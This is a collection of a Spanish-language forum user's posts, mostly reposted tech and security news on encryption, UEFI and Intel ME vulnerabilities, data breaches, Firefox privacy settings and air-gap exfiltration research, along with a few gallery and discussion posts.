La información transferida anteriormente, durante 15 años entre Estados Unidos y la Unión Europea, contenía datos como información fiscal de los trabajadores, y datos sobre los usuarios, que eran utilizados con fines publicitarios de cara a lanzarles publicidad personalizada, lo cual es de vital importancia para las empresas tecnológicas. La Ley anterior permitía a Estados Unidos transferir los datos de manera no segura argumentando que "una vez llegaban a servidores americanos, estos eran almacenados cumpliendo los estándares de seguridad europeos". Debido a que la Unión Europea no confiaba en esto, en octubre de 2015 declaró inválida la ley Safe Harbour y la transferencia de datos realizada de esa manera.

La desconfianza inicial de la Unión Europea hacia Estados Unidos vino originada por las revelaciones de Edward Snowden sobre la NSA en 2012 y las medidas espía de Estados Unidos sobre sus ciudadanos, y acabó culminando con el bloqueo temporal de la transferencia de datos hasta que hubiera un marco legal seguro sobre el que operar. A partir de la semana que viene, lo habrá.


Fuente:adslzone.net
#107
Desde que Edward Snowden hiciera público en 2012 que la NSA espía y analiza a todo lo que tiene acceso de la vida de los ciudadanos, empezó una carrera en pos de la seguridad en las comunicaciones que hacemos día a día. La aplicación que popularizó los mensajes cifrados fue Telegram, y WhatsApp acabó añadiéndolos también. Ahora, es Facebook Messenger la que ha decidido dar ese paso.

Facebook lleva mucho tiempo apostando por potenciar Facebook Messenger, y hacer que los usuarios la utilicen como aplicación de mensajería principal. A pesar de que los números disten de eso, y de que sea otra aplicación de su propiedad, WhatsApp, la que es líder en ese sector, Facebook sigue mejorando Messenger, y ha añadido cifrado end-to-end en sus mensajes para que el contenido de estos no pueda ser vulnerado.


Esta función lleva meses en fase de pruebas, y a partir de hoy estará disponible para determinados usuarios, ampliándose el número de usuarios que lo recibirán en las próximas semanas.

Con este cifrado, se tendrán conversaciones realmente "secretas", ya que sólo el usuario que manda y el que recibe el mensaje serán los que puedan leer el contenido de los mensajes. Ni ningún tipo de institución gubernamental ni la propia Facebook podrán leer los chats de los usuarios, haciendo así que las conversaciones sean totalmente privadas.

Al igual que ya ocurre en Telegram, se ha añadido también una función de autodestrucción de los mensajes, pudiendo elegir el tiempo que tardan éstos en autodestruirse. Una vez se cumpla el tiempo establecido, el mensaje desaparecerá de ambos dispositivos, y no quedará ni siquiera rastro en los servidores, pues esos mensajes nunca llegan a sincronizarse con ellos. Esta función sólo estará disponible en las aplicaciones de iOS y Android, y no así en la versión web de Messenger, ni en el chat de Facebook.


Según afirma el vicepresidente del servicio de mensajería de Facebook, David Marcus, este nuevo tipo de cifrado viene a complementar las medidas de seguridad que ya se utilizaban anteriormente en Messenger, además de ofrecer una mayor versatilidad a los usuarios para poder elegir qué tipo de conversación quieren tener. Además, añade que están cerca de alcanzar los 1.000 millones de usuarios.

El cifrado end-to-end será opcional y no vendrá activado por defecto. Serán los usuarios los que elijan si quieren o no activarlo. Esto será así para que los usuarios puedan recibir todas sus conversaciones tanto en la web como en el móvil, pudiendo elegir posteriormente qué conversaciones quieren que tengan este cifrado. Además, las conversaciones cifradas sólo serán compatibles con texto y emoticonos. Nada de GIFs, ni videos, ni pagos.


Fuente:adslzone.net
#108


Un investigador de software ruso llamado Dmytro Oleksiuk ha descubierto una vulnerabilidad que afecta a varios modelos de varias marcas de portátiles. Este tipo de vulnerabilidades se conocen como de día cero, y de momento no tiene ninguna solución por parte de los fabricantes. Además, el exploit es público, y cualquiera podría utilizarlo.

Esta vulnerabilidad consiste en que el código malicioso puede desactivar las medidas de seguridad de Windows en el inicio, ya que este fallo se encuentra dentro del UEFI, el cual se carga cuando se enciende el ordenador, y antes de que cargue el sistema operativo. Además, Oleksiuk afirma que el código podría ser modificado para que también funcionara a nivel de sistema operativo, pudiendo ser implementado junto con otro código malicioso.

El fallo se encuentra en el código fuente del System Management Mode, que se encuentra dentro de los paquetes del firmware UEFI. El hacker, además de hacer público el código fuente, lo compiló en un archivo .efi ejecutable para poder probarlo, con el objetivo de desactivar la protección de escritura del UEFI, y alterar finalmente el firmware del dispositivo.


Gracias a esta vulnerabilidad, se puede desactivar el UEFI Secure Boot, el Virtual Secure Mode, y la protección de credenciales de Windows 10 Enterprise.

Este fallo ha sido descubierto en portátiles de Lenovo, y se sabe que afecta a portátiles de HP y a la gran mayoría de fabricantes de portátiles, pues todas usan el mismo código IBV de Intel dentro de sus firmware UEFI. No sólo afecta a portátiles, sino que afecta también a una gran variedad de modelos de placas base de ordenadores de sobremesa compatibles con procesadores Sandy Bridge a Broadwell, como los modelos de Gigabyte Z68-UD3H, Z87MX-D3H y Z97-D3H.

Lenovo ha confirmado en su web que el fallo no se debe a un fallo de ellos ni de sus ingenieros, sino que es parte del código IBV que entrega Intel, el cual va dentro del BIOS y el UEFI.

Intel, por su parte, ha dicho que este fallo ya fue arreglado en 2014, por lo que el código distribuido a los fabricantes que incluía esta vulnerabilidad parece algo antiguo, y es de esperar que en el futuro este sea arreglado sin mayor inconveniente, ya sea mediante actualización, o mediante el lanzamiento de nuevos productos. Actualmente, de entre todas las marcas afectadas, Lenovo ha sido la única que ha hecho público que se encuentra en plena investigación del asunto, trabajando conjuntamente con Intel, y afirman que ofrecerán una solución que elimine este fallo pronto.

Queda la duda de si este fallo es un backdoor implementado en el UEFI, o si realmente es un fallo de seguridad como tal. Aun así, es muy probable que esto no acabe afectando al usuario común. Pero la vulnerabilidad existe, y es explotable.


Fuente:adslzone.net
#109
Tras la noticia del backdoor en los procesadores x86 de Intel, aparece la defensa de la compañía.

Pueden participar en un debate relacionado con el tema en este foro: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




Desde el descubrimiento de los acuerdos de la NSA y el gobierno de Estados Unidos con los principales fabricantes de hardware y desarrolladores de software para incluir puertas traseras en sus productos, las paranoias sobre espionaje mundial han estado presentes en el día a día. Mientras que las puertas traseras, conocidas como backdoors, más frecuentes son las basadas en software, detectables y posibles de eliminar, también existen puertas traseras implementadas directamente en el hardware, mucho más complejas e imposibles de eliminar, como ha ocurrido recientemente con Intel.

Hace dos semanas, varios expertos de seguridad descubrieron una puerta trasera oculta e imposible de tapar en las arquitecturas x86 de Intel. Para que los procesadores de la compañía funcionen deben hacer uso de un chip con un firmware específico y ultra-secreto llamado Intel Management Engine, conocido como ME.

Todo el software relacionado con el Intel Management Engine se almacena de forma segura y cifrada con algoritmos militares de manera que es prácticamente imposible adivinar de qué se trata, incluso haciendo ingeniería inversa. Sin embargo, lo que está claro es que ese módulo tiene permisos globales sobre el procesador y la memoria y cualquiera que se conecte a través del servidor TCP/IP que habilita durante el arranque tendrá control total sobre el sistema.

Además, al funcionar en tan bajo nivel, es imposible solucionarlo (salvo que la compañía diga que lo hace y nos fiemos de ella), imposible de saber si se están conectando a nuestro ordenador a través de dicho puerto e imposible de saber si han instalado, por ejemplo, un rootkit en la BIOS o en el propio procesador para facilitar el acceso remoto.


Intel asegura que no se trata de una puerta trasera, sino que es un módulo para gestionar actualizaciones

El responsable tecnológico de Intel, Steve Grobman, ha afirmado que su firmware ME no se trata de una puerta trasera ni se permite que nadie, incluso organizaciones gubernamentales, acceda a él. ME es una plataforma desarrollada por la compañía para facilitar la distribución de actualizaciones a empresas y administradores de sistemas.

La única forma de callar los rumores sobre las puertas traseras sería sometiéndose a una auditoría, sin embargo, la compañía se niega a ello. Es posible que tenga algo que ocultar, o que simplemente no le gusta que, aunque se firme un contrato de exclusividad, alguien pueda acceder a todo el código de su hardware, ya que en ocasiones es mejor sobrevivir a rumores que hacer pública la propiedad intelectual que, día a día, te da de comer.


Fuente:redeszone.net

#110


Google está trabajando duro desde hace tiempo por evitar ser golpeado por todo tipo de malware, y es que son muchas las vulnerabilidades detectadas y reconocidas en Android y que han afectado a un gran número de usuarios. Lo cierto es que los ciberdelincuentes tienen el punto de mira en Android debido a que es el sistema operativo que podemos encontrar en la mayoría de terminales del mercado hoy en día.

Pues bien, según acabamos de conocer hoy mismo, un investigador de seguridad está reportando un importante error que estaría afectando a millones de dispositivos Android de todo el mundo. Se trata de un problema en el sistema de cifrado de datos almacenados en los dispositivos con sistema operativo de Google y que estaría poniendo en peligro los datos de los usuarios.


Según la información ofrecida por el investigador, el sistema de cifrado de disco en Android podría romperse a través de ataques de fuerza bruta gracias a una serie de vulnerabilidades detectadas en diferentes componentes de la plataforma. Pero lo curioso y peor del caso, es que no sería sólo culpa de Google y por lo tanto estaríamos ante una situación donde la solución no podría aplicarse con un simple parche del sistema operativo.

Y es que en esta ocasión, el investigador de seguridad Gal Beniamini ha demostrado que el problema tiene que ver también con un componente hardware, en este caso con el procesador. Parece ser que la forma en que determinados chips de Qualcomm implementan algunas medidas de seguridad, junto con los problemas detectados en el núcleo de Android, pueden facilitar las cosas a un atacante para que se haga con nuestros datos, ya que sólo necesitaría hacerse con el PIN del usuario para poder acceder a ellos.


Aunque la buena noticia es que el investigador ya ha dado a conocer el problema tanto a Google como a Qualcomm, y ya se han lanzado algunos parches para corregir problemas a nivel de software, el lado malo viene cuando el investigador afirma que para solucionar por completo este problema habría que corregir el problema en los procesadores de los terminales afectados.

Sin duda que este problema quedará solucionado por parte de ambas compañías en los próximos procesadores y versiones de Android, pero lo que preocupa es que va a pasar con los posibles millones de terminales afectados por este problema. De momento, ambas compañías no han dado más detalles al respecto, por lo que habrá que esperar a ver si aportan alguna solución.

Fuente:adslzone.net
#111


La privacidad tiene cada vez mayor importancia entre los usuarios que se conectan a Internet y, por desgracia, cada vez es más complicada de mantener. Cada vez son más las webs y plataformas online que buscan recopilar información sobre los usuarios con distintos fines, por ejemplo, mejorar sus plataformas o venderlos a terceros interesados en estudios de mercado, sin embargo, esta falta de privacidad también preocupa a las empresas desarrolladores de los principales navegadores web, como Mozilla, quien busca cómo reforzar al máximo la privacidad de su navegador web Firefox.

Tor Browser es un navegador web basado en Firefox ESR especialmente diseñado para navegar por la red Tor, una red distribuida cuyas principales características son la privacidad y el anonimato. En esta red, mantener la privacidad es vital ya que constantemente hay empresas y organizaciones gubernamentales intentando identificar a los usuarios y recopilar la actividad de todo lo que hacen en esta red. Por ello, Tor Browser cuenta con una serie de opciones específicas para mejorar la privacidad dentro de esta red.

Hasta ahora, la única forma de blindar la privacidad de Firefox con las opciones de Tor Browser era mediante el uso de distintas extensiones desarrolladas para ese fin, sin embargo, tal como ha confirmado recientemente Mozilla, la compañía ha empezado a incluir las distintas opciones de seguridad y privacidad extremas de Tor Browser como opciones nativas de Firefox.

Entre otros, estas opciones de privacidad quieren bloquear los siguientes aspectos:


  • Ocultar el recuento de extensiones y los mimeTypes utilizados por muchas webs para generar una huella y poder rastrear la actividad de los usuarios.
  • Devolver un valor "0" cuando las webs intenten recopilar información sobre las variables landscape-primary y screen.orientation.type.
  • Eliminar el diálogo "Abrir con" de las descargas.


Las opciones de privacidad extremas para Firefox no estarán disponibles por defecto

Las opciones de privacidad extremas de Tor Browser no están pensadas para un público general ya que es posible que causen problemas con ciertas webs o servicios, por lo que los usuarios que quieran hacer uso de ellas tendrán que activarlas manualmente. Para ello, desde el apartado "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" tendremos que crear un nuevo valor del tipo "si/no" llamado "privacy.resistFingerprinting" con valor "true".

Si queremos bloquear también la opción "abrir con" de los archivos descargados, podemos cambiar igualmente a "true" el calor "browser.download.forbid_open_with".

Estas opciones tienen previstas su llegada a la rama estable con la versión 50 del navegador, sin embargo, algunas de ellas ya pueden verse en la última versión Nightly del mismo. Las demás opciones que aún no han sido implementadas irán llegando progresivamente en breve.

Sin duda, Mozilla está haciendo un gran trabajo para proteger la privacidad de sus usuarios y evitar que webs y servicios puedan seguir el rastro en la red de sus usuarios. Es cierto que estas son unas opciones muy radicales para proteger la privacidad, sin embargo, el hecho de estar deshabilitadas por defecto y tener que habilitarlas manualmente desde el apartado de configuración avanzada nos asegura que solo hagan uso de ellas quienes realmente sepan lo que están haciendo.


Fuente:redeszone.net
#112

Tanto a nivel de hardware como de software, Apple intenta que sus ordenadores sean lo más inaccesibles posible ante los atacantes. A pesar de ello, el software de los de Cupertino no está exento de fallos de seguridad, y este es uno de los más graves que se recuerdan.

Un ingeniero de seguridad informática, llamado fG!, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que permite resetear la contraseña del sistema. Para poder resetear la contraseña en un Mac en caso de olvido, había que contactar con el servicio técnico de Apple, y disponer de un recibo de compra original.

Para ello, el usuario tiene que reiniciar el dispositivo pulsando Comando + R. Luego, hay que pulsar Mayus + Control + Comando + Opciones + S, todas a la vez. Una vez pulsadas en el inicio, se genera un código de 33 dígitos en la pantalla. Ese código, junto con el número de serie del Mac, hay que dárselo a Apple para que envíen un archivo SCBO que permite resetear finalmente la contraseña. Estos archivos SCBO sólo puede generarlos Apple, ya que se requieren claves de cifrado a las que sólo tiene acceso la compañía que las crea. Incluso, fG! habla de que habría claves SCBO universales que permitirían acceder a varios tipos de Mac.


Con respecto a dónde conseguirlas, fG! ha descubierto en su investigación sobre este asunto que, pagando 100 dólares en una web, en la que se afirma que es posible obtener los archivos SCBO y resetear la contraseña sin tener que ponerse en contacto con Apple. No se sabe si es que los hackers han accedido a las claves de cifrado Apple, si las han conseguido mediante ingeniería inversa, o si las han conseguido por fuerza bruta. Esto último es realmente improbable, ya que hacen falta decenas de años para conseguirlas mediante fuerza bruta.

Los archivos SCBO son prácticamente inasequibles sin las claves de cifrado. Cabe la posibilidad de que este fallo venga causado por un trabajador de Apple que quiera sacarse un dinero extra en la red generando estos archivos SCBO. Al fin y al cabo, cualquier tienda con la certificación de Apple Premum Reseller puede acceder a este tipo de códigos. Incluso, ¿algún trabajador descontento que fue despedido, y cuya cuenta no fue borrada? Quien sabe.



Fuente:segu-info.com.ar
#113
Un grupo de investigadores afirman haber desarrollo un nuevo tipo de malware que puede robar datos personales de un ordenador aislado, es decir, sin conexión a la red o Internet, cámara o hardware de audio, utilizando para ello única y exclusivamente los sonidos generados por el procesador y los ventiladores del mismo. Sin duda, una nueva amenaza de la que tendremos que estar muy alerta.

Los avances en técnicas de espionaje buscan ir un paso más allá para evitar la necesidad de que el ordenador que se coloca como víctima tenga que estar conectado a la red. Para ello, se ingenian nuevas formas de conseguir los datos y la más reciente pasa por aprovechar los sonidos generados por los ventiladores que se encargan de enfriar el procesador. Al menos es lo que afirma un grupo de investigadores de la Universidad Ben Gurion de Israel.


En el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta explican que este nuevo tipo de ataque está dirigido a ordenadores aislados que normalmente no son accesibles por ningún método. Mientras que otros tipos de ataques se han centrado en interceptar los ultrasonidos emitidos por los altavoces, la novedad de este descubrimiento es que no necesita que existan altavoces, cámara u otro hardware ya que únicamente controlad y "escucha" la velocidad de los ventiladores del procesador.

Uno de los investigadores explica cómo han transmitido con éxito información desde un ordenador aislado a un smartphone situado en la misma sala que funciona como receptor. Siguen contando que su ataque puede ser utilizado para robar datos confidenciales de varias instalaciones con el único requisito de tener que contar con ventiladores.


Podríamos decir que este nuevo tipo de malware funciona como el código morse lo que nos permite hacernos una idea del rudimentario funcionamiento y de la velocidad de transmisión de los datos, que será realmente baja. Los investigadores nos cuentan que es posible de extraer 900 bits por hora con un dispositivo situado a 8 metros del equipo.

Sin embargo, este malware no está pensado para ser competencia de los más destacados del momento por velocidad o poder de infección ya que está especializado en un tipo de ordenadores que se encuentran aislados en determinadas localizaciones y a los que es imposible acceder por otros métodos.


Fuente:adslzone.net
#114
Saludos a la comunidad,

Estaba leyendo las noticias, y por casualidad encontré este tema. Me pareció interesante hacer un debate para ver las diferentes opiniones. Les dejo la info:



¿Llegarán los wearables a sustituir a los smartphones algún día?

Esta es una pregunta que un buen número de expertos se está comenzado a hacer entre otras cosas debido al estancamiento en cuanto a ventas que paulatinamente están sufriendo los teléfonos inteligentes en la actualidad.

Evidentemente preguntarse si los wearables podrán ser los sustitutos de nuestros «amados» teléfonos móviles hoy en día suena a un imposible, ya que de momento estos nuevos gadgets no están en absoluto capacitados para ello. Sin embargo si echamos la vista a dentro de 3 o 4 años, el panorama podría cambiar radicalmente, y no olvidemos que 3 o 4 años se pasan, como se suele decir, volando.


Sin embargo diversos estudios afirman que a partir del año 2020 estos wearables adquirirán tal protagonismo que en multitud de funcionalidades podrían convertirse en los sustitutos de los smartphones. Y es que hoy día estos gadgets básicamente se centran en aspectos relacionados con la salud, sector que lideran la pulseras de actividad, además de otros como los smartwatches; pero la gran mayoría funcionando de manera complementaria al móvil. Pero se especula con el hecho de que en los próximos años la tecnología de estos wearables y diversos productos relacionados con el Internet de la Cosas irá mejorando y cada vez se irán haciendo más inteligentes; hasta tal punto que el uso de la pantalla de los teléfonos inteligentes cada vez sea menor.

De hecho la mayoría de los usuarios espera que estos productos vayan mucho más allá de las tareas relacionadas con la salud adquiriendo funciones de seguridad personal, control de hogar, localizadores, autenticadores personales, sistemas de pago, etc. Es cierto que en gran medida en la actualidad los móviles están capacitados para llevar a cabo estas tareas, o la mayoría de ellas, pero en el futuro es posible que esto lo podamos llevar a cabo desde la ropa o desde nuestra propia piel, por medio de implantes, sin necesidad de llevar el móvil en el bolsillo.

Aunque todo esto pueda sonar a ciencia ficción, lo cierto es que más del 60% de los usuarios de smartphones encuestados afirman que dentro de 5 años será habitual el uso de chips colocados bajo la piel o pastillas de monitorización. Es más, para el mencionado año 2020 se espera que cada uno de nosotros utilice de manera habitual al menos 5 wearables, lo que podría suponer una seria caída en la usabilidad de los teléfonos inteligentes.

¿Creéis que todo esto será una realidad en un futuro cercano?


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




________________________________________________________________________________________________



Aprovecho para dejar mi opinión:

Creo que tal vez en un futuro los wearables puedan sustituir a los smartphones, pero no creo que sea en 4 o 5 años. A los wearables actuales aún les queda mucho por avanzar en comparación al desarrollo que han tenido los smartphones, y que siguen teniendo. Se pueden conseguir grandes cosas con los wearables, ya que tienen más posibilidades que los smartphones a la hora de innovar y crear utilidades que serían imposibles con un teléfono, y además, como dice en el árticulo, el auge del internet de las cosas favorecerá su desarrollo.

A lo mejor los mismos smartphones se convierten en menos de lo que esperamos en un wearable más.




Lo siento, ultimamente no tengo mucho tiempo para el foro. A lo mejor podría haberme extendido más con el tema.
Animense a debatir, HATI   ;D
#115
En Estados Unidos hay cada vez más y más estados que están permitiendo la comercialización y uso de marihuana con fines recreativos. Actualmente hay 25 estados que han legalizado la marihuana, siendo los últimos Pennsylvania y Ohio. En otoño, de momento, 5 estados más votarán si aprueban el uso recreativo de la marihuana, entre ellos California, que es el estado más poblado de Estados Unidos, con casi tanta población como España.

Ahora, Microsoft ha decidido aportar su granito de arena a este mercado emergente gracias a su controvertida legalización en los estados donde ya es legal. Microsoft ha sido la primera gran compañía que va a ofrecer productos para favorecer el recorrido comercial de la marihuana. En este caso, ha anunciado que va a lanzar un software para seguir el proceso que recorren las plantas de marihuana desde la semilla hasta el punto de venta. Con esto, Microsoft espera que los estados que tienen legalizada la marihuana utilicen su software con el fin de que el negocio sea lo más transparente posible, y no se vea obligado al oscurantismo.



Actualmente, apenas hay bancos que permitan que usuarios que venden abran una cuenta bancaria en su entidad para gestionar el dinero generado por la venta de marihuana. Es por eso que la gran mayoría de comercios que la venden tiene que operar con dinero en efectivo, con lo que este gesto no ayuda a que el negocio esté mejor controlado.

El principal objetivo del nuevo software de Microsoft es ayudar a la regulación de este mercado con el fin de que, una vez esté mejor regulado, aumente el número de transacciones y éstas sean más seguras. Desde Microsoft, afirman que tienen claro que este sector tiene un gran potencial de crecimiento en Estados Unidos.

El software de Microsoft, que estará disponible en la nube, ha sido desarrollado conjuntamente con una start-up sita en Los Ángeles llamada Kind. Esta empresa desarrolla ya unos puestos de venta similares a un cajero, en el que introduces el dinero, y el cajero te devuelve marihuana.


Microsoft no tendrá nada que ver con la venta en sí, sino que ofrecerá soporte para desarrollar y mantener el software que utiliza esta empresa. Software que será ofrecido principalmente a gobiernos locales y estatales que creen sistemas de gestión acordes con la ley.

Las ventas de marihuana en Estados Unidos generaron el año pasado 4.800 millones de dólares, y se espera que durante este año, al empezar a estar legalizada en más estados, aumente hasta los 6.500 millones, llegando a alcanzar los 20.000 millones de dólares para el año 2020, siempre y cuando California lo apruebe este otoño.


Fuente:adslzone.net
#116

Los foros del famoso cliente de BitTorrent uTorrent han sido hackeados, exponiendo información privada de unos 35.000 usuarios. Los hackers fueron capaces de acceder a la base de datos de usuarios, por lo que los desarrolladores de la aplicación advierten que las contraseñas podrían considerarse como comprometidas.

uTorrent no es una aplicación menor, sino que es posiblemente la más popular dentro de su segmento en el mundo entero, con unos 150 millones de usuarios activos al mes. Además de ofrecer la aplicación, su popularidad le ha permitido tener un foro activo con decenas de miles de visitas diarias y unos 388.000 miembros registrados. Según una reciente alerta de seguridad, los usuarios registrados en el foro tendrían que cambiar sus contraseñas lo antes posible.

El equipo de uTorrent, que forma parte de BitTorrent Inc, fue alertado del problema por uno de sus vendedores al principio de esta semana. "La vulnerabilidad parece haber sido explotada a través de uno de los clientes de los vendedores, sin embargo, ha permitido a los atacantes acceder a alguna información a través de otras cuentas. Como resultado, los atacantes fueron capaces de descargar una lista de los usuarios del foro", dicen desde uTorrent. Al parecer, el ataque no fue directamente en los foros, sino a través de uno de los vendedores.

La alerta de seguridad fue publicada en los foros, pero por ahora parece que los usuarios no han sido notificados individualmente. Tampoco se ha mencionado ninguna violación masiva de datos en el propio uTorrent o en las cuentas de redes sociales de esta. Debido a esto, al principio no se tenía claro qué datos habían sido comprometidos, aunque posteriormente se supo que fueron 35.000 cuentas según HaveIBennPwned (siendo llamadas BitTorrent accounts). El vendedor de la compañía ya ha hecho algunos cambios para mitigar las consecuencias, pero la contraseñas cifradas obtenidas ya se pueden considerar como comprometidas. La tecnología empleada para el foro de uTorrent es el mismo que para el de BitTorrent, sin embargo, no se tiene constancia de que este último haya sido comprometido.

Además de la investigación puesta en marcha para aclarar los hechos, desde uTorrent recomiendan a sus usuarios cambiar sus contraseñas, a pesar de que al estar cifradas no son de mucha utilidad, siempre es bueno andar con pies de plomo y apostar por lo seguro, siendo también muy importante cambiarla en otros sitios en los que se use la misma.



Fuente:muyseguridad.net
#117
Galería / Wallpaper Underc0de
Junio 09, 2016, 02:35:39 PM
Bueno, es algo simple, pero pienso que en lo simple también hay atractivo. Aqui se lo dejo:




Un saludo HATI  ;D
#118

En los últimos tiempos estamos en racha en lo que se refiere a ataques hacker del pasado realizados para obtener una gran cantidad de contraseñas. Si anteriormente le tocó a LinkedIn, Tumblr y Myspace, ahora le ha llegado el turno a la red social más popular de Rusia, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, de la cual se ha filtrado 100 millones de contraseñas después de recibir un ataque hacker.

La base de datos obtenida ocupa unos 17 gigabytes y contiene nombres completos (nombre y apellido), direcciones de correo, información de localización, números de teléfono y algunas direcciones de email secundarias. Pero lo más sorprendente son las contraseñas, que estaban almacenadas en texto plano. Los datos fueron puestos a la venta por el mismo hacker en el mercado negro (en la dark web) por el precio de 1 Bitcoin, que vienen a ser unos 580 dólares. La violación de los datos de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta fue inicialmente reportado por el buscador LeakedSource, que recibió porciones de la base de datos por parte de una persona que compró una copia.

Al igual que en los casos anteriores, el ataque pudo haberse realizado hace algunos años, concretamente entre finales de 2012 y principios de 2013. En aquella época muchos sitios web no aplicaban correctamente hash y sal sobre las contraseñas, por lo que estas no eran demasiado seguras. El caso de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta va un poco más allá, ya que las contraseñas ni siquiera estaban cifradas. Por esas fechas la red social que nos ocupa contaba con unos 190 millones de usuarios.

Entre las contraseñas filtradas se ha podido encontrar cosas como 123456, 123123 y qwerty. La mayoría de las direcciones de email son del servicio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

El hacker detrás del ataque es el mismo que en las ocasiones anteriores, peace_of_mind, quien también podría ser de origen ruso según la información que tenemos sobre él.


Fuente: TheHackerNews
#119
Hacking / [LockPicking] Hacking de cerraduras.
Junio 08, 2016, 09:06:00 AM

Creo que el reto de abrir cerraduras está muy relacionado con algunas ramas del hacking. Por eso me pareció interesante compartir esta guía con vosotros. Espero que les guste, aquí os la dejo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Saludos, HATI  ;D
#120
Galería / Logotipo design para web.
Junio 07, 2016, 04:53:11 PM
Aqui les dejo el logotipo que diseñe para la web No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:


Si necesitan un ayuda para un logotipo pueden enviarme un mp.

Un saludo HATI   ;D